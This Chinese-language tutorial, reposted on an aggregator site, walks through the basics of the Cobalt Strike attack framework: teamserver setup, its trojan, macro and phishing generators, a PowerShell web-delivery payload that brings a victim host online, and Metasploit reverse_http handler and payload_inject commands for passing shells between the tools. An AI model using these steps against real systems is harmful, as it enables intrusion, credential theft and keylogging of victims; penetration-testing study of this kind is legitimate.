Cobalt Strike基本使用

这篇具有很好参考价值的文章主要介绍了Cobalt Strike基本使用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Cobalt Strike简介

Cobalt Strike是一款由java编写的全平台多方协同渗透测试框架,在3.0版本之前它基于Metasploit框架工作,在3.0后的版本以独立成一个渗透测试平台。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节,且其最大的优点在于可以进行团队合作和优越的UI界面。

Cobalt Strike文件结构

1.agscript 拓展应用的脚本
2.c2lint 检查profile的错误异常
3. cobaltstrike 客户端程序
4.cobaltstrike.jar
5.logs 日志
6.data TeamServer的一些数据
7.teamserver 团队服务器程序
8.update 用于更新Cobalt Strike
9.update.jar
10.third-party 第三方工具
Cobalt Strike基本使用

Cobalt Strike使用

CobaltStrike分为客户端和服务端,Cobalt Strike 需要团队服务器才能使用。

(1)启动TeamServer
./teamserver 192.168.178.128 123456 #ip为本机服务器ip 123456为设置的密码

如果要将团队服务器部署在公网上,记得加强密码强度,防止团队服务器密码被破解
Cobalt Strike基本使用(2)启动Cobalt Strike Client
Cobalt Strike基本使用
Host为团队服务器ip地址

Port为默认端口

User为连接的用户,用户可以自行选择

Password为团队服务器设置的密码

点击Connect连接之后
Cobalt Strike基本使用

再点击是,则加入成功。

Cobalt Strike基本使用

Cobalt Strike模块详解

Cobalt Strike模块

Cobalt Strike基本使用Cobalt Strike基本使用

New Connection # 新建连接,支持连接多个服务器端
Preferences # 设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录
Visualization # 主要展示输出结果的视图
VPN Interfaces # 设置VPN接口
Listenrs # 创建监听器
Script Manager # 脚本管理,可以通过AggressorScripts脚本来加强自身,能够扩展菜单栏,Beacon命令行,提权脚本等
Close # 退出连接

View模块

Cobalt Strike基本使用Cobalt Strike基本使用
Applications # 显示受害主机的应用信息
Credentials # 显示所有以获取的受害主机的凭证,如hashdump、Mimikatz
Downloads # 查看已下载文件
Event Log # 主机上线记录以及团队协作聊天记录
Keystrokes # 查看键盘记录结果
Proxy Pivots # 查看代理模块
Screenshots # 查看所有屏幕截图
Script Console # 加载第三方脚本以增强功能
Targets # 显示所有受害主机
Web Log # 所有Web服务的日志

Attacks模块
Cobalt Strike基本使用

Packages
Cobalt Strike基本使用

1.HTML Application                # 生成(executable/VBA/powershell)这三种原理实现的恶意HTA木马文件
2.MS Office Macro                 # 生成office宏病毒文件
3.Payload Generator               # 生成各种语言版本的payload
4.Windows Executable              # 生成可执行exe木马
5.Windows Executable(Stageless)   # 生成无状态的可执行exe木马

Web-Drive-by

Cobalt Strike基本使用

1.Manage                  # 对开启的web服务进行管理
2.Clone Site              # 克隆网站,可以记录受害者提交的数据
3.Host File               # 提供文件下载,可以选择Mime类型
4.Scripted Web Delivery   # 为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery 
5.Signed Applet Attack    # 使用java自签名的程序进行钓鱼攻击(该方法已过时)
6.Smart Applet Attack     # 自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本(该方法已过时)
7.Spear Phish             # 鱼叉钓鱼邮件

Reporting模块

Cobalt Strike基本使用

Cobalt Strike基本使用

1.Activity Report                      # 活动报告
2.Hosts Report                         # 主机报告
3.Indicators of Compromise             # IOC报告:包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes
4.Sessions Report                      # 会话报告
5.Social Engineering Report            # 社会工程报告:包括鱼叉钓鱼邮件及点击记录
6.Tactics, Techniques, and Procedures  # 战术技术及相关程序报告:包括行动对应的每种战术的检测策略和缓解策略
7.Reset Data                           # 重置数据
8.Export Data                          # 导出数据,导出.tsv文件格式

Help模块

Cobalt Strike基本使用

Cobalt Strike基本使用

1.Homepage             # 官方主页
2.Support              # 技术支持
3.Arsenal              # 开发者
4.System information   # 版本信息
5.About                # 关于

工具导航栏

Cobalt Strike基本使用

1.1.新建连接
2.2.断开当前连接
3.3.监听器
4.4.改变视图为Pivot Graph(视图列表)
5.5.改变视图为Session Table(会话列表)
6.6.改变视图为Target Table(目标列表)
7.7.显示所有以获取的受害主机的凭证
8.8.查看已下载文件
9.9.查看键盘记录结果
10.10.查看屏幕截图
11.11.生成无状态的可执行exe木马
12.12.使用java自签名的程序进行钓鱼攻击
13.13.生成office宏病毒文件
14.14.为payload提供web服务以便下载和执行
15.15.提供文件下载,可以选择Mime类型
16.16.管理Cobalt Strike上运行的web服务
17.17.帮助
18.18.关于

利用Cobalt Strike获取一个Beacon

1、创建Listener

Cobalt Strike基本使用

在Listeners的面板中点击Add

Cobalt Strike基本使用

然后输入名称(任意),选择监听器类型,团队服务器ip和监听端口保存即可。

Cobalt Strike基本使用

然后在监听的面板中就可以看到我们的监听器

Cobalt Strike基本使用

在有了监听器之后,我们就可以选择我们的攻击模块进行漏洞利用了。我们这里选择Scripted Web Delivery攻击模块(为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery)

Cobalt Strike基本使用

然后配置号监听端口和监听器后点击Launch

Cobalt Strike基本使用

然后会生成一个payload

Cobalt Strike基本使用

复制payload在powershell中执行,肉鸡即可上线

Cobalt Strike基本使用

我们可以进如Interact的交互模式进行执行命令

Cobalt Strike基本使用

Cobalt Strike基本使用

Cobalt Strike功能详解

Listeners(监听模块)

在监听模块中内置了八个内置payload

Cobalt Strike基本使用

1.wndows/beacon_dns/reverse_dns_txt
2.windows/beacon_http/reverse_http
3.windows/beacon_https/reverse_https
4.windows/beacon_bind_pipe
5.windows/beacon_tcp
6.windows/beacon_extc2
7.windows/foreign/reverse_http
8.windows/foreign/reverse_https

这些payload中windows/beacon为内置监听器,且有dns、http、https、smb、tcp、extc2六种监听方式,windows/foreign为外部监听器。

内置监听器的使用原理和之前配置监听器原理大致相同,这里主要再演示一下外部监听器的使用。

首先我们选择外置监听器Foreign模块,填写相关配置内容

Cobalt Strike基本使用

然后打开在msf中配置相应监听模块

1.msf5 > use exploit/multi/handler 
2.msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
3.msf5 exploit(multi/handler) > set lhost 192.168.178.128  #此处的IP地址和监听端口要和cs中设置的保持一致
4.msf5 exploit(multi/handler) > set lport 4444


1.msf5 exploit(multi/handler) > run

配置好之后我们就可以通过此监听器来传递我们的shell了,点击spawn

Cobalt Strike基本使用

选择我们设置的msf这个外监听器

Cobalt Strike基本使用

这样在msf这边就可以接受到cs这边传递过来的shell

Cobalt Strike基本使用

这里讲述到了cs传递shell到msf,就不得不在提一提msf传递到cs了。

首先我们把刚才接受到的session退出,这里记住这个session的id为1

Cobalt Strike基本使用

然后使用模块

1.msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject



1.msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http  #切记这里的payload的协议要与cs的一致

选择上了这个模块之后我们在回到cs上创建一个监听器,我这里有个之前创建好的监听器

Cobalt Strike基本使用

那我们继续回到msf上配置session和lhost和lport(切记这里的lhost和lport要和cs上监听器上配置的是一致的)
Cobalt Strike基本使用

然后run执行在cs上等待上线即可。

Cobalt Strike基本使用

Attacks(攻击模块)

Scripted Web Delivery

上面演示的是使用attacks模块中的scripted web delivery模块来进行拿到靶机的shell

Cobalt Strike基本使用

Cobalt Strike基本使用

这里有几个配置选项

1.URL Path:存放payload的位置
2.Local Host:团队服务器ip地址
3.Local Port:团队服务器端口
4.Listener:监听器
5.Type:要选择的脚本类型

全部配置好了之后,点击launch后,会弹出payload

Cobalt Strike基本使用

在靶机上运行之后,靶机会在Teamserver下载payload,然后执行并加载到内存中,从而获取主机的Beacon。

Manage

Cobalt Strike基本使用

Cobalt Strike基本使用

我们生成的监听器和一些payload都能在这里进行管理。

Windows Executable

Cobalt Strike基本使用

Cobalt Strike基本使用

使用方法也和之前大致相同,配置好监听器和Output即可,这里的Output分为EXE和DLL两种类型。

1.Windows EXE:windows的可执行文件
2.Windows Service EXE:基于服务的windows可执行文件,可以将可执行文件添加到服务中。
3.Windows DLL:DLL文件,一般用于DLL劫持、提权和反弹Beacon。

Payload Generator

Cobalt Strike基本使用

Cobalt Strike基本使用

配置监听器,选择对应脚本语言即可。文章来源地址https://www.toymoban.com/news/detail-447729.html

到了这里,关于Cobalt Strike基本使用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Cobalt Strike安装教程

    Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。这款神器许多大佬们都已经玩的很6,我一个菜鸡玩的略有心得,因此写一下自己的Cobaltstrike系列文章,希望给各位一点帮助。 最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上

    2023年04月08日
    浏览(25)
  • Cobalt Strike Beacon 初探

    RTO I 的课程结束了,Cobalt Strike 算是会用了。然后继上一篇文章之后,我还没有机会用 Cobalt Strike Beacon 做一下 Windows Defender Bypass。之后会写。 另外,我也想问一下我自己,Cobalt Strike 里面最基本的 payload - beacon,你了解清楚了吗? 所以今天,我就花点时间给自己解惑,同时也

    2024年02月04日
    浏览(31)
  • Cobalt Strike 连接启动教程(1)

    最免杀,怕被360之类的查杀,就用带s的  一次性 第八步:右键---目标----文件管理----能进入运行了病毒牧马diannao的系统了     第十步:对方桌面任何东西点击不了,点击下面带帽子的黑色小人, 就可以操作对方电nao   点击目标-----------端口扫描---------弹出扫描框(这个扫描

    2024年02月06日
    浏览(27)
  • Cobalt Strike之反向上线操作

    Cobalt Strike 使用 GUI 框架 SWING(一种java GUI的库)开发,攻击者可通过CS木马在 beacon 元数据中注入恶意 HTML 标签,使得Cobalt Strike对其进行解析并且加载恶意代码(类似XSS攻击),从而在目标系统上执行任意代码。 攻击者需要通过CS木马在 beacon 元数据中注入恶意payload,恰好F

    2024年02月05日
    浏览(30)
  • Cobalt Strike第五篇导入插件

    CobaltStrike有两种加载插件的方法,一种是在客户端加载,一种是在服务端加载。在客户端加载,当客户端没连接上服务端后,该插件即不会被加载。所以有时候需要在服务端加载某些插件。 一、插件下载 二、客户端加载 点击 CobaltStrike– Script Manager 点击 Load 加载插件,加载

    2024年02月16日
    浏览(36)
  • Cobalt Strike 连接启动教程,制作图片?(2)

    安装工具:      

    2024年02月06日
    浏览(31)
  • 【渗透测试】利用Cobalt Strike渗透Windows

    在kali中使用Cobalt Strike对Windows进行渗透 kali(服务端):192.168.175.129 win11(攻击机):192.168.175.128 win11(靶机):192.168.175.137 将压缩包解压 进入解压后的Server文件夹,赋予文件执行权限 192.168.175.129为Kali机器的IP, 1234 为团队接入的口令,后面需要用到 在Win11攻击机中将Coba

    2024年02月16日
    浏览(26)
  • 保姆级教学!小白也会的cobalt strike搭建

    目录 简介 环境及工具 搭建部署 1.端口配置 2.远程连接服务器 3.JAVA环境安装 4.上传cs工具压缩包 5.服务器上解压cs工具压缩包 6.启动CS服务端 7.客户端连接 cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端

    2023年04月18日
    浏览(32)
  • 【渗透测试】Cobalt Strike制作钓鱼邮件渗透Windows

    在kali中使用Cobalt Strike制作钓鱼邮件,对Windows进行渗透 kali(服务端):192.168.175.129 win11(攻击机):192.168.175.128 win11(靶机):192.168.175.137 将压缩包解压 若要解压到指定路径,先新建文件夹,使用以下命令 进入解压后的Server文件夹,赋予文件执行权限 192.168.175.129为Kali机器

    2024年02月16日
    浏览(33)
  • 内网安全:横向传递攻击( RDP || Cobalt Strike )

    横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.( 传递攻击主

    2024年02月10日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包